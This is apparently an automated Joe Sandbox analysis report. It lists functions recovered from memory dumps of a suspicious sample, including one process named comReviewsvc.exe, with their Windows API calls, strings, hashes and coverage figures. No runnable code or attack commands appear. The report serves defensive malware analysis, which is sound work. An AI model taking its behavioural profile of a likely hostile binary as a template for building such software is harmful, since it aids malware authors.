Instruction ID: 3b9c8e93a99ee5cccf409203e75ec5f2ba3cb5937a9f8c3540bf9be999378f3a
Opcode Fuzzy Hash: 8797dd318a1b3fdc6bfcde48ac583cd9d2d8426bbb2ae7945f751abec92958fe
Instruction Fuzzy Hash: C501B576508285EFDB118F96FC44B9E3BE5F709344B108475F905D3270CB708850DBA0

Function 00BF9A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00BF9AA9
__alldvrm.LIBCMT ref: 00BF9CAA
__alldvrm.LIBCMT ref: 00BF9CCC

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction ID: d93a00a8774eac78e9fb3cc1eb5cb6b9fe2eef07f4062582b9a516878bd01861
Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
Instruction Fuzzy Hash: 62A15A7290438E9FEB25CF28C8917BEBBE5EF55310F2441EDE6959B282C2358D49C750

Function 00BDA354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00BD7F69,?,?,?), ref: 00BDA3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00BD7F69,?), ref: 00BDA43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?), ref: 00BDA4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,00BD7F69,?,?,?,?,?,?,?,?,?,?), ref: 00BDA4C6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: fa60a393bb77fbdb0396b3f42e51c554b8ff74d8bdd0cca77ad011c836ded668
Instruction ID: 3564c93af1a888a608465ae1536acbb62c3586ec5a3962dadd00afd231d5f142
Opcode Fuzzy Hash: fa60a393bb77fbdb0396b3f42e51c554b8ff74d8bdd0cca77ad011c836ded668
Instruction Fuzzy Hash: E441CF31248381AAD731DF24DC45FAEFBE9AB85710F04099EB5E1932C0E6A49A48DB53

Function 00BD1100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BD112B
_wcslen.LIBCMT ref: 00BD1153
_wcslen.LIBCMT ref: 00BD1182
_wcslen.LIBCMT ref: 00BD11A9

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: dc6657493e90fe2136edfe3b8b751718e8aeb83ede6a7e006482db2fd88ad0fc
Instruction ID: c0c17e9b2fe4407bcbb4cb9bee7e0e37e1a4329abb5114b234250e43d955758c
Opcode Fuzzy Hash: dc6657493e90fe2136edfe3b8b751718e8aeb83ede6a7e006482db2fd88ad0fc
Instruction Fuzzy Hash: 2741A97190066A5FCB25AF688C45AEFBBF8EF11710F00045AFD45F7245DB70AE498BA4

Function 00BFC988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00BF91E0,?,00000000,?,00000001,?,?,00000001,00BF91E0,?), ref: 00BFC9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BFCA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00BF6CBE,?), ref: 00BFCA70
__freea.LIBCMT ref: 00BFCA79

Part of subcall function 00BF8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BFCA2C,00000000,?,00BF6CBE,?,00000008,?,00BF91E0,?,?,?), ref: 00BF8E38

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 36a50ceec3d716d499350745f88cf08082b94e411b737855cf4043f624e1c287
Instruction ID: a8467814390ef4d1ce108a1c4acb7ea1de92d4ae3c46a7b16c32aa90dd9b4453
Opcode Fuzzy Hash: 36a50ceec3d716d499350745f88cf08082b94e411b737855cf4043f624e1c287
Instruction Fuzzy Hash: 8631AC72A0020EABDB25CF64CC41EBE7BE5EF41710B1541A8E904E7290E735DD98CB90

Function 00BEA663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00BEA666
GetDeviceCaps.GDI32(00000000,00000058), ref: 00BEA675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BEA683
ReleaseDC.USER32(00000000,00000000), ref: 00BEA691

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: d084b52a4c3e765289a5014dbbe7d408c3af1804f8dcee691f59280d39d5c4d5
Instruction ID: abe2f9a272a3c64da9223fef385809ff974321b2670b3214d7242bc391fe9606
Opcode Fuzzy Hash: d084b52a4c3e765289a5014dbbe7d408c3af1804f8dcee691f59280d39d5c4d5
Instruction Fuzzy Hash: 1FE08C31966761ABC3241B60AC4DBCE3E58AB06B52F008100FB059A190DB6486048BA0

Function 00BEA80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00BEA699: GetDC.USER32(00000000), ref: 00BEA69D
Part of subcall function 00BEA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BEA6A8
Part of subcall function 00BEA699: ReleaseDC.USER32(00000000,00000000), ref: 00BEA6B3

GetObjectW.GDI32(?,00000018,?), ref: 00BEA83C

Part of subcall function 00BEAAC9: GetDC.USER32(00000000), ref: 00BEAAD2
Part of subcall function 00BEAAC9: GetObjectW.GDI32(?,00000018,?), ref: 00BEAB01
Part of subcall function 00BEAAC9: ReleaseDC.USER32(00000000,?), ref: 00BEAB99

Strings

(, xrefs: 00BEA9AA

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 3c30538cfe5d384a6a531e0aba337dc330cf6fbe400e0d9b028952aca2dde3b8
Instruction ID: 616de988dbe82ef96a3425f63c1c697d1535367ef4f48e052d016bf771a0c40d
Opcode Fuzzy Hash: 3c30538cfe5d384a6a531e0aba337dc330cf6fbe400e0d9b028952aca2dde3b8
Instruction Fuzzy Hash: 5491E171608394AFD610DF25D888A2BBBECFFC9700F00495EF59AD3261DB30A945CB62

Function 00BFB1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BFB324

Part of subcall function 00BF9097: IsProcessorFeaturePresent.KERNEL32(00000017,00BF9086,00000050,00C03A34,?,00BDD710,00000004,00C11030,?,?,00BF9093,00000000,00000000,00000000,00000000,00000000), ref: 00BF9099
Part of subcall function 00BF9097: GetCurrentProcess.KERNEL32(C0000417,00C03A34,00000050,00C11030), ref: 00BF90BB
Part of subcall function 00BF9097: TerminateProcess.KERNEL32(00000000), ref: 00BF90C2

Strings

*?, xrefs: 00BFB1FB
., xrefs: 00BFB4DB

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction ID: 078a44ade3753eabd655ed72347a04a32c47417ab1f85051f2682a08cb73591b
Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
Instruction Fuzzy Hash: EF516F75E0010EAFDF14DFA8C881ABDBBF5EF58314F2441A9EA54E7341E7359A098B50

Function 00BD75DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BD75E3

Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0

Part of subcall function 00BDA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00BDA598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BD777F

Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532

Strings

:, xrefs: 00BD7654

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: d4e98fe2175796d4ebf5150a5cdc4bfae1f565c593df8c9ffe4cda1c197e74bd
Instruction ID: 96d08b08d01b27cdf373272ea1cc2940dd8b5b13edff9d259ca2961d99f3bdf8
Opcode Fuzzy Hash: d4e98fe2175796d4ebf5150a5cdc4bfae1f565c593df8c9ffe4cda1c197e74bd
Instruction Fuzzy Hash: 1D415171801158AAEB25EB64DC95EDEF7F8EF55300F0040E7A609A2292FB745F84CF61

Function 00BEB48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00BEB4E3
_wcslen.LIBCMT ref: 00BEB4FE

Strings

}, xrefs: 00BEB4D6

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: b48c530ccda4beed9dada973cbe0357e7b8e524134895576bf91b02cb2e1f82b
Instruction ID: 9f765cfecaf0b19b283411315542e6123ad9f055830b3d1a94fe952c507c8481
Opcode Fuzzy Hash: b48c530ccda4beed9dada973cbe0357e7b8e524134895576bf91b02cb2e1f82b
Instruction Fuzzy Hash: 1921027290438A5AD731EA65D855E7FB3ECDFA1750F1404AAF640C3241EB65DE4C83B2

Function 00BDF344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
Part of subcall function 00BDF2C5: GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4

GetCurrentProcessId.KERNEL32(?,?,?,00BDF33E), ref: 00BDF3D2

Strings

CryptUnprotectMemory failed, xrefs: 00BDF3CA
CryptProtectMemory failed, xrefs: 00BDF389

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 7a45a32c68e995c121d372e7eff5090d7f2c161dc8321df561aafc7409f11f1e
Instruction ID: 40af1255a9608e39f9a16c900178372607d939b949e9464c82b00d72cab3fbe2
Opcode Fuzzy Hash: 7a45a32c68e995c121d372e7eff5090d7f2c161dc8321df561aafc7409f11f1e
Instruction Fuzzy Hash: AB11363160D22AABDF155B20DC4577EB798FF01770B1681A7FC025B351EA309E018698

Function 00BDB991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BDB9B8

Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5

Strings

%c:\, xrefs: 00BDB9AE

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: a13aa4db28c1d8db4b95bec343c04ae8c8ab31f450074f44d3b010adf1b4f036
Instruction ID: 29677c4e3b73a5a3e0586e23eab0bc9839b97a017bf1858307223d43e02b0587
Opcode Fuzzy Hash: a13aa4db28c1d8db4b95bec343c04ae8c8ab31f450074f44d3b010adf1b4f036
Instruction Fuzzy Hash: 4601DE63500312A99A30AB758C82D7BE7ECEE957B0B55489BF644D7282FF24D84483B1

Function 00BE101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00BE1160,?,00000000,00000000), ref: 00BE1043
SetThreadPriority.KERNEL32(?,00000000), ref: 00BE108A

Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54

Strings

CreateThread failed, xrefs: 00BE104F

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 2cd4c1ba85909c946b6fb911eac81465950aad4fd20b918ce80f42df541c10b4
Instruction ID: ce9027efc85cc6055ea4c9cff009de47d401b72c1baf619f8cff104a98f30a59
Opcode Fuzzy Hash: 2cd4c1ba85909c946b6fb911eac81465950aad4fd20b918ce80f42df541c10b4
Instruction Fuzzy Hash: A50149B5344389AFD3346F29AC51BBAB3D8EB85351F30046EFA8652281DBB068C48330

Function 00BD1316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00BDE2E8: _swprintf.LIBCMT ref: 00BDE30E
Part of subcall function 00BDE2E8: _strlen.LIBCMT ref: 00BDE32F
Part of subcall function 00BDE2E8: SetDlgItemTextW.USER32(?,00C0E274,?), ref: 00BDE38F
Part of subcall function 00BDE2E8: GetWindowRect.USER32(?,?), ref: 00BDE3C9
Part of subcall function 00BDE2E8: GetClientRect.USER32(?,?), ref: 00BDE3D5

GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370

Strings

0, xrefs: 00BD1319

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 7348ed69b1cc7ab6e7b0af2c33bdb6847387394874ddbad971466782059562e4
Instruction ID: 346944d8caab5a9d1e1db15c5d0df45127f6b0f4217260694111fd25a6a6bfd0
Opcode Fuzzy Hash: 7348ed69b1cc7ab6e7b0af2c33bdb6847387394874ddbad971466782059562e4
Instruction Fuzzy Hash: 1DF0A4301143CCBADF191F548C0D7EEBBD8EF04355F048995FD44546A1EB78C990EA14

Function 00BE0FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00BE1206,?), ref: 00BE0FEA
GetLastError.KERNEL32(?), ref: 00BE0FF6

Part of subcall function 00BD6C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD6C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00BE0FFF

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d9eea25f082a2fd5536222ba9098eb03a7ed24c968f7169b1d998c922da6e952
Instruction ID: df2edf76874eb94c3c45df7d77ec3cef3cb79efdb15b850af57e43349e0a0e0e
Opcode Fuzzy Hash: d9eea25f082a2fd5536222ba9098eb03a7ed24c968f7169b1d998c922da6e952
Instruction Fuzzy Hash: DDD02B7150857076C61033245C05F6F7908CF12331F650755F238502F2CB2409819291

Function 00BDE29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00BDDA55,?), ref: 00BDE2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00BDDA55,?), ref: 00BDE2B1

Strings

RTL, xrefs: 00BDE2AB

Memory Dump Source

Source File: 00000003.00000002.1421673153.0000000000BD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000003.00000002.1421648851.0000000000BD0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421715104.0000000000C03000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C0E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C15000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421737031.0000000000C32000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1421795646.0000000000C33000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_bd0000_DC.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 23d5742fe4e98543852f19e2a72f3c4f2874e5a6ee3a52fb2dc96fe38e05ad27
Instruction ID: eabf8a486bfb3e9c365d3636296acbbae526f1435e6bfbab63088396635bbf87
Opcode Fuzzy Hash: 23d5742fe4e98543852f19e2a72f3c4f2874e5a6ee3a52fb2dc96fe38e05ad27
Instruction Fuzzy Hash: FEC0123124179066E63027656C4DB476A5C5B00B15F06045DB581E92D1DAA5C540C6A0

Analysis Process: comReviewsvc.exePID: 6544, Parent PID: 4240COMMON

Execution Graph

Execution Coverage:	3.2%
Dynamic/Decrypted Code Coverage:	78.6%
Signature Coverage:	0%
Total number of Nodes:	14
Total number of Limit Nodes:	1

Executed Functions

Function 00007FFAAC400DA0 Relevance: 5.3, Strings: 4, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC400F1D
b4, xrefs: 00007FFAAC400F9C
r6, xrefs: 00007FFAAC400F40
"9, xrefs: 00007FFAAC400E47

Memory Dump Source

Source File: 00000008.00000002.1698099128.00007FFAAC400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac400000_comReviewsvc.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6
API String ID: 0-2382298496
